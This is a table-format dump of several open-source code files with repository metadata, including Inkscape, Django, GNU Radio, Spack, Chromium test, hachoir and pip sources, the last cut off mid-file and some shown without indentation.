repo_name (stringlengths 5-100) | path (stringlengths 4-375) | copies (stringclasses, 991 values) | size (stringlengths 4-7) | content (stringlengths 666-1M) | license (stringclasses, 15 values) |
---|---|---|---|---|---|
tik0/inkscapeGrid | share/extensions/previous_glyph_layer.py | 6 | 1479 | #!/usr/bin/env python
'''
Copyright (C) 2011 Felipe Correa da Silva Sanches
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
'''
import inkex
class PreviousLayer(inkex.Effect):
    def __init__(self):
        inkex.Effect.__init__(self)

    def effect(self):
        # Get access to main SVG document element
        self.svg = self.document.getroot()
        groups = self.svg.findall(inkex.addNS('g', 'svg'))

        count = 0
        glyphs = []
        for g in groups:
            if "GlyphLayer-" in g.get(inkex.addNS('label', 'inkscape')):
                glyphs.append(g)
                if g.get("style") == "display:inline":
                    count += 1
                    current = len(glyphs) - 1

        if count != 1 or len(glyphs) < 2:
            return
            # TODO: inform the user?

        glyphs[current].set("style", "display:none")
        glyphs[current - 1].set("style", "display:inline")
        return
        # TODO: loop


if __name__ == '__main__':
    e = PreviousLayer()
    e.affect()
| gpl-2.0 |
sharbison3/python-docs-samples | appengine/flexible/django_cloudsql/mysite/urls.py | 8 | 1069 | # Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.conf import settings
from django.conf.urls import include, url
from django.contrib import admin
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
urlpatterns = [url(r'^', include('polls.urls')),
               url(r'^admin/', admin.site.urls)]

# This enables static files to be served from the Gunicorn server
# In Production, serve static files from Google Cloud Storage or an alternative
# CDN
if settings.DEBUG:
    urlpatterns += staticfiles_urlpatterns()
| apache-2.0 |
alfayez/gnuradio | gr-audio/examples/python/spectrum_inversion.py | 10 | 2422 | #!/usr/bin/env python
#
# Copyright 2004,2005,2007 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
# Gang - Here's a simple script that demonstrates spectrum inversion
# using the multiply by [1,-1] method (mixing with Nyquist frequency).
# Requires nothing but a sound card, and sounds just like listening
# to a SSB signal on the wrong sideband.
#
from gnuradio import gr
from gnuradio import audio
from gnuradio.eng_option import eng_option
from optparse import OptionParser
class my_top_block(gr.top_block):

    def __init__(self):
        gr.top_block.__init__(self)

        parser = OptionParser(option_class=eng_option)
        parser.add_option("-I", "--audio-input", type="string", default="",
                          help="pcm input device name. E.g., hw:0,0 or /dev/dsp")
        parser.add_option("-O", "--audio-output", type="string", default="",
                          help="pcm output device name. E.g., hw:0,0 or /dev/dsp")
        parser.add_option("-r", "--sample-rate", type="eng_float", default=8000,
                          help="set sample rate to RATE (8000)")
        (options, args) = parser.parse_args()
        if len(args) != 0:
            parser.print_help()
            raise SystemExit, 1

        sample_rate = int(options.sample_rate)

        src = audio.source(sample_rate, options.audio_input)
        dst = audio.sink(sample_rate, options.audio_output)

        vec1 = [1, -1]
        vsource = gr.vector_source_f(vec1, True)
        multiply = gr.multiply_ff()

        self.connect(src, (multiply, 0))
        self.connect(vsource, (multiply, 1))
        self.connect(multiply, dst)


if __name__ == '__main__':
    try:
        my_top_block().run()
    except KeyboardInterrupt:
        pass
| gpl-3.0 |
tmerrick1/spack | var/spack/repos/builtin/packages/sniffles/package.py | 5 | 1968 | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Sniffles(CMakePackage):
    """Structural variation caller using third generation sequencing."""

    homepage = "https://github.com/fritzsedlazeck/Sniffles/wiki"
    url = "https://github.com/fritzsedlazeck/Sniffles/archive/v1.0.5.tar.gz"

    version('1.0.7', '83bd93c5ab5dad3a6dc776f11d3a880e')
    version('1.0.5', 'c2f2350d00418ba4d82c074e7f0b1832')

    # the build process doesn't actually install anything, do it by hand
    def install(self, spec, prefix):
        mkdir(prefix.bin)
        src = "bin/sniffles-core-{0}".format(spec.version.dotted)
        binaries = ['sniffles', 'sniffles-debug']
        for b in binaries:
            install(join_path(src, b), join_path(prefix.bin, b))
| lgpl-2.1 |
AICP/external_chromium_org | native_client_sdk/src/build_tools/tests/test_server.py | 170 | 2165 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import multiprocessing
import os
import SimpleHTTPServer
class LocalHTTPServer(object):
    """Class to start a local HTTP server as a child process."""

    def __init__(self, serve_dir):
        parent_conn, child_conn = multiprocessing.Pipe()
        self.process = multiprocessing.Process(target=_HTTPServerProcess,
                                               args=(child_conn, serve_dir))
        self.process.start()
        if parent_conn.poll(10):  # wait 10 seconds
            self.port = parent_conn.recv()
        else:
            raise Exception('Unable to launch HTTP server.')
        self.conn = parent_conn

    def Shutdown(self):
        """Send a message to the child HTTP server process and wait for it to
        finish."""
        self.conn.send(False)
        self.process.join()

    def GetURL(self, rel_url):
        """Get the full url for a file on the local HTTP server.

        Args:
          rel_url: A URL fragment to convert to a full URL. For example,
              GetURL('foobar.baz') -> 'http://localhost:1234/foobar.baz'
        """
        return 'http://localhost:%d/%s' % (self.port, rel_url)


class QuietHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    def log_message(self, msg_format, *args):
        pass


def _HTTPServerProcess(conn, serve_dir):
    """Run a local httpserver with a randomly-chosen port.

    This function assumes it is run as a child process using multiprocessing.

    Args:
      conn: A connection to the parent process. The child process sends
          the local port, and waits for a message from the parent to
          stop serving.
      serve_dir: The directory to serve. All files are accessible through
          http://localhost:<port>/path/to/filename.
    """
    import BaseHTTPServer
    os.chdir(serve_dir)
    httpd = BaseHTTPServer.HTTPServer(('', 0), QuietHTTPRequestHandler)
    conn.send(httpd.server_address[1])  # the chosen port number
    httpd.timeout = 0.5  # seconds
    running = True
    while running:
        httpd.handle_request()
        if conn.poll():
            running = conn.recv()
    conn.close()
| bsd-3-clause |
Mirantis/solar | solar/dblayer/gevent_patches.py | 3 | 1348 | # Copyright 2015 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
def _patch(obj, name, target):
    orig = getattr(obj, name)
    setattr(obj, '_orig_%s' % name, orig)
    setattr(obj, name, target)


def patch_all():
    from solar.dblayer.model import ModelMeta

    if ModelMeta._defined_models:
        raise RuntimeError(
            "You should run patch_multi_get before defining models")

    from solar.dblayer.model import Model
    from solar.dblayer.gevent_helpers import get_local
    from solar.dblayer.gevent_helpers import multi_get
    from solar.dblayer.gevent_helpers import solar_map
    from solar import utils

    _patch(Model, 'multi_get', multi_get)
    _patch(utils, 'solar_map', solar_map)
    _patch(utils, 'get_local', get_local)
    _patch(Model, '_local', get_local()())
| apache-2.0 |
b0ttl3z/SickRage | lib/hachoir_metadata/video.py | 57 | 15504 | from hachoir_core.field import MissingField
from hachoir_metadata.metadata import (registerExtractor,
Metadata, RootMetadata, MultipleMetadata)
from hachoir_metadata.metadata_item import QUALITY_GOOD
from hachoir_metadata.safe import fault_tolerant
from hachoir_parser.video import MovFile, AsfFile, FlvFile
from hachoir_parser.video.asf import Descriptor as ASF_Descriptor
from hachoir_parser.container import MkvFile
from hachoir_parser.container.mkv import dateToDatetime
from hachoir_core.i18n import _
from hachoir_core.tools import makeUnicode, makePrintable, timedelta2seconds
from datetime import timedelta
class MkvMetadata(MultipleMetadata):
tag_key = {
"TITLE": "title",
"URL": "url",
"COPYRIGHT": "copyright",
# TODO: maybe use another name?
# Its value may be different than (...)/Info/DateUTC/date
"DATE_RECORDED": "creation_date",
# TODO: Extract subtitle metadata
"SUBTITLE": "subtitle_author",
}
def extract(self, mkv):
for segment in mkv.array("Segment"):
self.processSegment(segment)
def processSegment(self, segment):
for field in segment:
if field.name.startswith("Info["):
self.processInfo(field)
elif field.name.startswith("Tags["):
for tag in field.array("Tag"):
self.processTag(tag)
elif field.name.startswith("Tracks["):
self.processTracks(field)
elif field.name.startswith("Cluster["):
if self.quality < QUALITY_GOOD:
return
def processTracks(self, tracks):
for entry in tracks.array("TrackEntry"):
self.processTrack(entry)
def processTrack(self, track):
if "TrackType/enum" not in track:
return
if track["TrackType/enum"].display == "video":
self.processVideo(track)
elif track["TrackType/enum"].display == "audio":
self.processAudio(track)
elif track["TrackType/enum"].display == "subtitle":
self.processSubtitle(track)
def trackCommon(self, track, meta):
if "Name/unicode" in track:
meta.title = track["Name/unicode"].value
if "Language/string" in track:
meta.language = track["Language/string"].value
else:
meta.language = "eng"
def processVideo(self, track):
video = Metadata(self)
self.trackCommon(track, video)
try:
video.compression = track["CodecID/string"].value
if "Video" in track:
video.width = track["Video/PixelWidth/unsigned"].value
video.height = track["Video/PixelHeight/unsigned"].value
except MissingField:
pass
self.addGroup("video[]", video, "Video stream")
def getDouble(self, field, parent):
float_key = '%s/float' % parent
if float_key in field:
return field[float_key].value
double_key = '%s/double' % parent
if double_key in field:
return field[double_key].value
return None
def processAudio(self, track):
audio = Metadata(self)
self.trackCommon(track, audio)
if "Audio" in track:
frequency = self.getDouble(track, "Audio/SamplingFrequency")
if frequency is not None:
audio.sample_rate = frequency
if "Audio/Channels/unsigned" in track:
audio.nb_channel = track["Audio/Channels/unsigned"].value
if "Audio/BitDepth/unsigned" in track:
audio.bits_per_sample = track["Audio/BitDepth/unsigned"].value
if "CodecID/string" in track:
audio.compression = track["CodecID/string"].value
self.addGroup("audio[]", audio, "Audio stream")
def processSubtitle(self, track):
sub = Metadata(self)
self.trackCommon(track, sub)
try:
sub.compression = track["CodecID/string"].value
except MissingField:
pass
self.addGroup("subtitle[]", sub, "Subtitle")
def processTag(self, tag):
for field in tag.array("SimpleTag"):
self.processSimpleTag(field)
def processSimpleTag(self, tag):
if "TagName/unicode" not in tag \
or "TagString/unicode" not in tag:
return
name = tag["TagName/unicode"].value
if name not in self.tag_key:
return
key = self.tag_key[name]
value = tag["TagString/unicode"].value
setattr(self, key, value)
def processInfo(self, info):
if "TimecodeScale/unsigned" in info:
duration = self.getDouble(info, "Duration")
if duration is not None:
try:
seconds = duration * info["TimecodeScale/unsigned"].value * 1e-9
self.duration = timedelta(seconds=seconds)
except OverflowError:
# Catch OverflowError for timedelta (long int too large
# to be converted to an int)
pass
if "DateUTC/date" in info:
try:
self.creation_date = dateToDatetime(info["DateUTC/date"].value)
except OverflowError:
pass
if "WritingApp/unicode" in info:
self.producer = info["WritingApp/unicode"].value
if "MuxingApp/unicode" in info:
self.producer = info["MuxingApp/unicode"].value
if "Title/unicode" in info:
self.title = info["Title/unicode"].value
class FlvMetadata(MultipleMetadata):
def extract(self, flv):
if "video[0]" in flv:
meta = Metadata(self)
self.extractVideo(flv["video[0]"], meta)
self.addGroup("video", meta, "Video stream")
if "audio[0]" in flv:
meta = Metadata(self)
self.extractAudio(flv["audio[0]"], meta)
self.addGroup("audio", meta, "Audio stream")
# TODO: Compute duration
# One technique: use the last video/audio chunk and its timestamp
# But this is very slow
self.format_version = flv.description
if "metadata/entry[1]" in flv:
self.extractAMF(flv["metadata/entry[1]"])
if self.has('duration'):
self.bit_rate = flv.size / timedelta2seconds(self.get('duration'))
@fault_tolerant
def extractAudio(self, audio, meta):
if audio["codec"].display == "MP3" and "music_data" in audio:
meta.compression = audio["music_data"].description
else:
meta.compression = audio["codec"].display
meta.sample_rate = audio.getSampleRate()
if audio["is_16bit"].value:
meta.bits_per_sample = 16
else:
meta.bits_per_sample = 8
if audio["is_stereo"].value:
meta.nb_channel = 2
else:
meta.nb_channel = 1
@fault_tolerant
def extractVideo(self, video, meta):
meta.compression = video["codec"].display
def extractAMF(self, amf):
for entry in amf.array("item"):
self.useAmfEntry(entry)
@fault_tolerant
def useAmfEntry(self, entry):
key = entry["key"].value
if key == "duration":
self.duration = timedelta(seconds=entry["value"].value)
elif key == "creator":
self.producer = entry["value"].value
elif key == "audiosamplerate":
self.sample_rate = entry["value"].value
elif key == "framerate":
self.frame_rate = entry["value"].value
elif key == "metadatacreator":
self.producer = entry["value"].value
elif key == "metadatadate":
self.creation_date = entry.value
elif key == "width":
self.width = int(entry["value"].value)
elif key == "height":
self.height = int(entry["value"].value)
class MovMetadata(RootMetadata):
def extract(self, mov):
for atom in mov:
if "movie" in atom:
self.processMovie(atom["movie"])
@fault_tolerant
def processMovieHeader(self, hdr):
self.creation_date = hdr["creation_date"].value
self.last_modification = hdr["lastmod_date"].value
self.duration = timedelta(seconds=float(hdr["duration"].value) / hdr["time_scale"].value)
self.comment = _("Play speed: %.1f%%") % (hdr["play_speed"].value*100)
self.comment = _("User volume: %.1f%%") % (float(hdr["volume"].value)*100)
@fault_tolerant
def processTrackHeader(self, hdr):
width = int(hdr["frame_size_width"].value)
height = int(hdr["frame_size_height"].value)
if width and height:
self.width = width
self.height = height
def processTrack(self, atom):
for field in atom:
if "track_hdr" in field:
self.processTrackHeader(field["track_hdr"])
def processMovie(self, atom):
for field in atom:
if "track" in field:
self.processTrack(field["track"])
if "movie_hdr" in field:
self.processMovieHeader(field["movie_hdr"])
class AsfMetadata(MultipleMetadata):
EXT_DESC_TO_ATTR = {
"Encoder": "producer",
"ToolName": "producer",
"AlbumTitle": "album",
"Track": "track_number",
"TrackNumber": "track_total",
"Year": "creation_date",
"AlbumArtist": "author",
}
SKIP_EXT_DESC = set((
# Useless information
"WMFSDKNeeded", "WMFSDKVersion",
"Buffer Average", "VBR Peak", "EncodingTime",
"MediaPrimaryClassID", "UniqueFileIdentifier",
))
def extract(self, asf):
if "header/content" in asf:
self.processHeader(asf["header/content"])
def processHeader(self, header):
compression = []
is_vbr = None
if "ext_desc/content" in header:
# Extract all data from ext_desc
data = {}
for desc in header.array("ext_desc/content/descriptor"):
self.useExtDescItem(desc, data)
# Have ToolName and ToolVersion? If yes, group them to producer key
if "ToolName" in data and "ToolVersion" in data:
self.producer = "%s (version %s)" % (data["ToolName"], data["ToolVersion"])
del data["ToolName"]
del data["ToolVersion"]
# "IsVBR" key
if "IsVBR" in data:
is_vbr = (data["IsVBR"] == 1)
del data["IsVBR"]
# Store data
for key, value in data.iteritems():
if key in self.EXT_DESC_TO_ATTR:
key = self.EXT_DESC_TO_ATTR[key]
else:
if isinstance(key, str):
key = makePrintable(key, "ISO-8859-1", to_unicode=True)
value = "%s=%s" % (key, value)
key = "comment"
setattr(self, key, value)
if "file_prop/content" in header:
self.useFileProp(header["file_prop/content"], is_vbr)
if "codec_list/content" in header:
for codec in header.array("codec_list/content/codec"):
if "name" in codec:
text = codec["name"].value
if "desc" in codec and codec["desc"].value:
text = "%s (%s)" % (text, codec["desc"].value)
compression.append(text)
audio_index = 1
video_index = 1
for index, stream_prop in enumerate(header.array("stream_prop")):
if "content/audio_header" in stream_prop:
meta = Metadata(self)
self.streamProperty(header, index, meta)
self.streamAudioHeader(stream_prop["content/audio_header"], meta)
if self.addGroup("audio[%u]" % audio_index, meta, "Audio stream #%u" % audio_index):
audio_index += 1
elif "content/video_header" in stream_prop:
meta = Metadata(self)
self.streamProperty(header, index, meta)
self.streamVideoHeader(stream_prop["content/video_header"], meta)
if self.addGroup("video[%u]" % video_index, meta, "Video stream #%u" % video_index):
video_index += 1
if "metadata/content" in header:
info = header["metadata/content"]
try:
self.title = info["title"].value
self.author = info["author"].value
self.copyright = info["copyright"].value
except MissingField:
pass
@fault_tolerant
def streamAudioHeader(self, audio, meta):
if not meta.has("compression"):
meta.compression = audio["twocc"].display
meta.nb_channel = audio["channels"].value
meta.sample_rate = audio["sample_rate"].value
meta.bits_per_sample = audio["bits_per_sample"].value
@fault_tolerant
def streamVideoHeader(self, video, meta):
meta.width = video["width"].value
meta.height = video["height"].value
if "bmp_info" in video:
bmp_info = video["bmp_info"]
if not meta.has("compression"):
meta.compression = bmp_info["codec"].display
meta.bits_per_pixel = bmp_info["bpp"].value
@fault_tolerant
def useExtDescItem(self, desc, data):
if desc["type"].value == ASF_Descriptor.TYPE_BYTE_ARRAY:
# Skip binary data
return
key = desc["name"].value
if "/" in key:
# Replace "WM/ToolName" with "ToolName"
key = key.split("/", 1)[1]
if key in self.SKIP_EXT_DESC:
# Skip some keys
return
value = desc["value"].value
if not value:
return
value = makeUnicode(value)
data[key] = value
@fault_tolerant
def useFileProp(self, prop, is_vbr):
self.creation_date = prop["creation_date"].value
self.duration = prop["play_duration"].value
if prop["seekable"].value:
self.comment = u"Is seekable"
value = prop["max_bitrate"].value
text = prop["max_bitrate"].display
if is_vbr is True:
text = "VBR (%s max)" % text
elif is_vbr is False:
text = "%s (CBR)" % text
else:
text = "%s (max)" % text
self.bit_rate = (value, text)
def streamProperty(self, header, index, meta):
key = "bit_rates/content/bit_rate[%u]/avg_bitrate" % index
if key in header:
meta.bit_rate = header[key].value
# TODO: Use codec list
# It doesn't work when the video uses /header/content/bitrate_mutex
# since the codec list are shared between streams but... how is it
# shared?
# key = "codec_list/content/codec[%u]" % index
# if key in header:
# codec = header[key]
# if "name" in codec:
# text = codec["name"].value
# if "desc" in codec and codec["desc"].value:
# meta.compression = "%s (%s)" % (text, codec["desc"].value)
# else:
# meta.compression = text
registerExtractor(MovFile, MovMetadata)
registerExtractor(AsfFile, AsfMetadata)
registerExtractor(FlvFile, FlvMetadata)
registerExtractor(MkvFile, MkvMetadata)
| gpl-3.0 |
guildai/guild | guild/external/pip/_internal/req/req_install.py | 8 | 43743 | from __future__ import absolute_import
import io
import logging
import os
import re
import shutil
import sys
import sysconfig
import traceback
import zipfile
from distutils.util import change_root
from email.parser import FeedParser # type: ignore
from pip._vendor import pkg_resources, pytoml, six
from pip._vendor.packaging import specifiers
from pip._vendor.packaging.markers import Marker
from pip._vendor.packaging.requirements import InvalidRequirement, Requirement
from pip._vendor.packaging.utils import canonicalize_name
from pip._vendor.packaging.version import Version
from pip._vendor.packaging.version import parse as parse_version
from pip._vendor.pkg_resources import RequirementParseError, parse_requirements
from pip._internal import wheel
from pip._internal.build_env import NoOpBuildEnvironment
from pip._internal.compat import native_str
from pip._internal.download import (
is_archive_file, is_url, path_to_url, url_to_path,
)
from pip._internal.exceptions import InstallationError
from pip._internal.locations import (
PIP_DELETE_MARKER_FILENAME, running_under_virtualenv,
)
from pip._internal.req.req_uninstall import UninstallPathSet
from pip._internal.utils.hashes import Hashes
from pip._internal.utils.logging import indent_log
from pip._internal.utils.misc import (
_make_build_dir, ask_path_exists, backup_dir, call_subprocess,
display_path, dist_in_site_packages, dist_in_usersite, ensure_dir,
get_installed_version, is_installable_dir, read_text_file, rmtree,
)
from pip._internal.utils.setuptools_build import SETUPTOOLS_SHIM
from pip._internal.utils.temp_dir import TempDirectory
from pip._internal.utils.ui import open_spinner
from pip._internal.vcs import vcs
from pip._internal.wheel import Wheel, move_wheel_files
logger = logging.getLogger(__name__)
operators = specifiers.Specifier._operators.keys()
def _strip_extras(path):
m = re.match(r'^(.+)(\[[^\]]+\])$', path)
extras = None
if m:
path_no_extras = m.group(1)
extras = m.group(2)
else:
path_no_extras = path
return path_no_extras, extras
class InstallRequirement(object):
"""
Represents something that may be installed later on, may have information
about where to fetch the relevant requirement and also contains logic for
installing the said requirement.
"""
def __init__(self, req, comes_from, source_dir=None, editable=False,
link=None, update=True, markers=None,
isolated=False, options=None, wheel_cache=None,
constraint=False, extras=()):
assert req is None or isinstance(req, Requirement), req
self.req = req
self.comes_from = comes_from
self.constraint = constraint
if source_dir is not None:
self.source_dir = os.path.normpath(os.path.abspath(source_dir))
else:
self.source_dir = None
self.editable = editable
self._wheel_cache = wheel_cache
if link is not None:
self.link = self.original_link = link
else:
from pip._internal.index import Link
self.link = self.original_link = req and req.url and Link(req.url)
if extras:
self.extras = extras
elif req:
self.extras = {
pkg_resources.safe_extra(extra) for extra in req.extras
}
else:
self.extras = set()
if markers is not None:
self.markers = markers
else:
self.markers = req and req.marker
self._egg_info_path = None
# This holds the pkg_resources.Distribution object if this requirement
# is already available:
self.satisfied_by = None
# This hold the pkg_resources.Distribution object if this requirement
# conflicts with another installed distribution:
self.conflicts_with = None
# Temporary build location
self._temp_build_dir = TempDirectory(kind="req-build")
# Used to store the global directory where the _temp_build_dir should
# have been created. Cf _correct_build_location method.
self._ideal_build_dir = None
# True if the editable should be updated:
self.update = update
# Set to True after successful installation
self.install_succeeded = None
# UninstallPathSet of uninstalled distribution (for possible rollback)
self.uninstalled_pathset = None
self.options = options if options else {}
# Set to True after successful preparation of this requirement
self.prepared = False
self.is_direct = False
self.isolated = isolated
self.build_env = NoOpBuildEnvironment()
# Constructors
# TODO: Move these out of this class into custom methods.
@classmethod
def from_editable(cls, editable_req, comes_from=None, isolated=False,
options=None, wheel_cache=None, constraint=False):
from pip._internal.index import Link
name, url, extras_override = parse_editable(editable_req)
if url.startswith('file:'):
source_dir = url_to_path(url)
else:
source_dir = None
if name is not None:
try:
req = Requirement(name)
except InvalidRequirement:
raise InstallationError("Invalid requirement: '%s'" % name)
else:
req = None
return cls(
req, comes_from, source_dir=source_dir,
editable=True,
link=Link(url),
constraint=constraint,
isolated=isolated,
options=options if options else {},
wheel_cache=wheel_cache,
extras=extras_override or (),
)
@classmethod
def from_req(cls, req, comes_from=None, isolated=False, wheel_cache=None):
try:
req = Requirement(req)
except InvalidRequirement:
raise InstallationError("Invalid requirement: '%s'" % req)
if req.url:
raise InstallationError(
"Direct url requirement (like %s) are not allowed for "
"dependencies" % req
)
return cls(req, comes_from, isolated=isolated, wheel_cache=wheel_cache)
@classmethod
def from_line(
cls, name, comes_from=None, isolated=False, options=None,
wheel_cache=None, constraint=False):
"""Creates an InstallRequirement from a name, which might be a
requirement, directory containing 'setup.py', filename, or URL.
"""
from pip._internal.index import Link
if is_url(name):
marker_sep = '; '
else:
marker_sep = ';'
if marker_sep in name:
name, markers = name.split(marker_sep, 1)
markers = markers.strip()
if not markers:
markers = None
else:
markers = Marker(markers)
else:
markers = None
name = name.strip()
req = None
path = os.path.normpath(os.path.abspath(name))
link = None
extras = None
if is_url(name):
link = Link(name)
else:
p, extras = _strip_extras(path)
looks_like_dir = os.path.isdir(p) and (
os.path.sep in name or
(os.path.altsep is not None and os.path.altsep in name) or
name.startswith('.')
)
if looks_like_dir:
if not is_installable_dir(p):
raise InstallationError(
"Directory %r is not installable. File 'setup.py' "
"not found." % name
)
link = Link(path_to_url(p))
elif is_archive_file(p):
if not os.path.isfile(p):
logger.warning(
'Requirement %r looks like a filename, but the '
'file does not exist',
name
)
link = Link(path_to_url(p))
# it's a local file, dir, or url
if link:
# Handle relative file URLs
if link.scheme == 'file' and re.search(r'\.\./', link.url):
link = Link(
path_to_url(os.path.normpath(os.path.abspath(link.path))))
# wheel file
if link.is_wheel:
wheel = Wheel(link.filename) # can raise InvalidWheelFilename
req = "%s==%s" % (wheel.name, wheel.version)
else:
# set the req to the egg fragment. when it's not there, this
# will become an 'unnamed' requirement
req = link.egg_fragment
# a requirement specifier
else:
req = name
if extras:
extras = Requirement("placeholder" + extras.lower()).extras
else:
extras = ()
if req is not None:
try:
req = Requirement(req)
except InvalidRequirement:
if os.path.sep in req:
add_msg = "It looks like a path."
add_msg += deduce_helpful_msg(req)
elif '=' in req and not any(op in req for op in operators):
add_msg = "= is not a valid operator. Did you mean == ?"
else:
add_msg = traceback.format_exc()
raise InstallationError(
"Invalid requirement: '%s'\n%s" % (req, add_msg))
return cls(
req, comes_from, link=link, markers=markers,
isolated=isolated,
options=options if options else {},
wheel_cache=wheel_cache,
constraint=constraint,
extras=extras,
)
def __str__(self):
if self.req:
s = str(self.req)
if self.link:
s += ' from %s' % self.link.url
else:
s = self.link.url if self.link else None
if self.satisfied_by is not None:
s += ' in %s' % display_path(self.satisfied_by.location)
if self.comes_from:
if isinstance(self.comes_from, six.string_types):
comes_from = self.comes_from
else:
comes_from = self.comes_from.from_path()
if comes_from:
s += ' (from %s)' % comes_from
return s
def __repr__(self):
return '<%s object: %s editable=%r>' % (
self.__class__.__name__, str(self), self.editable)
def populate_link(self, finder, upgrade, require_hashes):
"""Ensure that if a link can be found for this, that it is found.
Note that self.link may still be None - if Upgrade is False and the
requirement is already installed.
If require_hashes is True, don't use the wheel cache, because cached
wheels, always built locally, have different hashes than the files
downloaded from the index server and thus throw false hash mismatches.
Furthermore, cached wheels at present have nondeterministic contents due
to file modification times.
"""
if self.link is None:
self.link = finder.find_requirement(self, upgrade)
if self._wheel_cache is not None and not require_hashes:
old_link = self.link
self.link = self._wheel_cache.get(self.link, self.name)
if old_link != self.link:
logger.debug('Using cached wheel link: %s', self.link)
# Things that are valid for all kinds of requirements?
@property
def name(self):
if self.req is None:
return None
return native_str(pkg_resources.safe_name(self.req.name))
@property
def specifier(self):
return self.req.specifier
@property
def is_pinned(self):
"""Return whether I am pinned to an exact version.
For example, some-package==1.2 is pinned; some-package>1.2 is not.
"""
specifiers = self.specifier
return (len(specifiers) == 1 and
next(iter(specifiers)).operator in {'==', '==='})
@property
def installed_version(self):
return get_installed_version(self.name)
def match_markers(self, extras_requested=None):
if not extras_requested:
# Provide an extra to safely evaluate the markers
# without matching any extra
extras_requested = ('',)
if self.markers is not None:
return any(
self.markers.evaluate({'extra': extra})
for extra in extras_requested)
else:
return True
@property
def has_hash_options(self):
"""Return whether any known-good hashes are specified as options.
These activate --require-hashes mode; hashes specified as part of a
URL do not.
"""
return bool(self.options.get('hashes', {}))
def hashes(self, trust_internet=True):
"""Return a hash-comparer that considers my option- and URL-based
hashes to be known-good.
Hashes in URLs--ones embedded in the requirements file, not ones
downloaded from an index server--are almost peers with ones from
flags. They satisfy --require-hashes (whether it was implicitly or
explicitly activated) but do not activate it. md5 and sha224 are not
allowed in flags, which should nudge people toward good algos. We
always OR all hashes together, even ones from URLs.
:param trust_internet: Whether to trust URL-based (#md5=...) hashes
downloaded from the internet, as by populate_link()
"""
good_hashes = self.options.get('hashes', {}).copy()
link = self.link if trust_internet else self.original_link
if link and link.hash:
good_hashes.setdefault(link.hash_name, []).append(link.hash)
return Hashes(good_hashes)
def from_path(self):
"""Format a nice indicator to show where this "comes from"
"""
if self.req is None:
return None
s = str(self.req)
if self.comes_from:
if isinstance(self.comes_from, six.string_types):
comes_from = self.comes_from
else:
comes_from = self.comes_from.from_path()
if comes_from:
s += '->' + comes_from
return s
def build_location(self, build_dir):
assert build_dir is not None
if self._temp_build_dir.path is not None:
return self._temp_build_dir.path
if self.req is None:
# for requirement via a path to a directory: the name of the
# package is not available yet so we create a temp directory
# Once run_egg_info will have run, we'll be able
# to fix it via _correct_build_location
# Some systems have /tmp as a symlink which confuses custom
# builds (such as numpy). Thus, we ensure that the real path
# is returned.
self._temp_build_dir.create()
self._ideal_build_dir = build_dir
return self._temp_build_dir.path
if self.editable:
name = self.name.lower()
else:
name = self.name
# FIXME: Is there a better place to create the build_dir? (hg and bzr
# need this)
if not os.path.exists(build_dir):
logger.debug('Creating directory %s', build_dir)
_make_build_dir(build_dir)
return os.path.join(build_dir, name)
def _correct_build_location(self):
"""Move self._temp_build_dir to self._ideal_build_dir/self.req.name
For some requirements (e.g. a path to a directory), the name of the
package is not available until we run egg_info, so the build_location
will return a temporary directory and store the _ideal_build_dir.
This is only called by self.egg_info_path to fix the temporary build
directory.
"""
if self.source_dir is not None:
return
assert self.req is not None
assert self._temp_build_dir.path
assert self._ideal_build_dir.path
old_location = self._temp_build_dir.path
self._temp_build_dir.path = None
new_location = self.build_location(self._ideal_build_dir)
if os.path.exists(new_location):
raise InstallationError(
'A package already exists in %s; please remove it to continue'
% display_path(new_location))
logger.debug(
'Moving package %s from %s to new location %s',
self, display_path(old_location), display_path(new_location),
)
